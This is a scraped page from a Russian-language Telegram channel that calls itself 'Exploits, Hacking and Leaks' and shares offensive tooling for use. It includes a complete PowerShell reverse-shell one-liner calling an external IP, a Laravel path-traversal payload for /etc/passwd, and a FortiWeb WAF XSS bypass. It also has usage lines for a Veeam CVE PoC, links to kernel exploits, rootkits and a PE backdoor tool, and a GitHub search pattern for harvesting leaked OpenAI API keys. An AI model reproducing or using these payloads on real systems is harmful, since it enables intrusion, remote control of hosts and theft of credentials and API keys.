Proxy Bar – Telegram
Proxy Bar
19.5K subscribers
1.29K photos
79 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
Круто !!! old school sniffing RJ45
берем крокодильчики
цепляем на витуху
погнали
Video
👍31😱19🔥5
полезные нагрузки подъехали
payloads
👍24🔥3
PowerShell открывает TCP-сокет на удаленном сервере и выполняет ввод в виде команды, отправляя вывод обратно.
Тупо бэкдор!

usage:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('106.12.252.10',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
🔥34😱9👍5
Laravel Framework

Payload: //////////////////../../../../../../../../etc/passwd
🔥41😱13👍6
UAC bypass for x64 Windows 7 - 11
Понятно
iscsicpl.exe уязвим к перехвату порядка поиска DLL при запуске 32-битного бинарного файла Microsoft на 64-битном хосте через SysWOW64.
😱7👍1
Рубрика нам пишут
Black Angel is a Windows 11/10 x64 kernel mode rootkit. Rootkit can be loaded with enabled DSE while maintaining its full functionality.
link
👍11🔥2
bypass for the FortiWeb (Fortinet) WAF
usage:
"><iframe src=//14.rs>
то есть вместо стандартной полезной нагрузки XSS для выполнения js
😱17👍4🔥3
pic of day
😱42🔥11👍4
kernel-linux-factory
*
Удобно тем, что не нужно компилировать или настраивать среду, глянул какое ядро, запустил сплоет, получил по морде #root
*
в составе exploits для:
CVE-2016-9793
4-20-BPF-integer
CVE-2017-5123
CVE-2017-6074
CVE-2017-7308
CVE-2017-8890
CVE-2017-11176
CVE-2017-16995
CVE-2017-1000112
CVE-2018-5333
CVE-2019-9213 & CVE-2019-8956
CVE-2019-15666
CVE-2020-8835
CVE-2020-27194
CVE-2021-3156
CVE-2021-31440
CVE-2021-3490
CVE-2021-22555
CVE-2021-41073
CVE-2021-4154
CVE-2021-42008
CVE-2021-43267
CVE-2022-0185
CVE-2022-0847
CVE-2022-0995
CVE-2022-1015
CVE-2022-2588
CVE-2022-2639
CVE-2022-25636
CVE-2022-27666
CVE-2022-32250
CVE-2022-34918

download

#linux #exploits #kernel
👍22🔥3😱1
CVE-2023-27532
Да, опять Veeam Backup & Replication
Утечка учёток в виде открытого текста, либо выполнение удаленного выполнения команды.
*
Аналитика
*
POC exploit
*
usage:
VeeamHax.exe --target 192.168.0.100
или
VeeamHax.exe --target 192.168.0.100 --cmd calc.exe

#veeam #rce #leakPass
🔥12👍6
Время добрых дел.
Многие знают, есть такой клёвый юзер xss.is yashechka
Он генерирует тонны крайне полезного хакерского контента, переводит западный контент, записывает ролики (в том числе и обучающие), лепит красивые pdf - и все это в 99.9 % бесплатно и для людей.
Но случилась беда. И yashechka вот вот останется без глаз, в прямом смысле слова. Зрение yashechka терял давно, болезнь прогрессирует и сейчас на стадии "еще немного и глаза откажут".
Все это крайне страшно и этого хотелось бы избежать. Поэтому yashechka всё таки смог написать пост на xss.is с призывом о помощи:
S.M.E. - Прошу руку помощи у форумчан
Там Вы найдете историю как так вышло, как он остался без работы потому что ослеп, как болезнь прогрессирует и реквизиты по которым можно оказать помощь.
*
Наш канал не пройдет мимо и тоже окажет помощь.
👍57😱23🔥6
Бывает полезно скрыть ip через hex/decimal преобразование
windows\linux\browser - работает везде
*
вот вам 2 варианта, и bash и powershell
😱5
🔥15😱7
Chaos-Rootkit
x64 ring0 windows rootkit
download

#rootkit #windows #ring0
👍11
ChatGPT for CyberSecurity
PDF
🔥18👍4😱3
Вдруг вам нужно

403-bypass.py
bypass-403.sh
B1pass3r

#403
👍17🔥5😱2
github dork to find openai api key

/"sk-[a-zA-Z0-9]{20,50}"/
🔥54👍9😱9
Рубрика: Нам пишут
CaveCarver
PE backdooring tool which utilizes and automates code cave technique

#backdoor #PE
👍8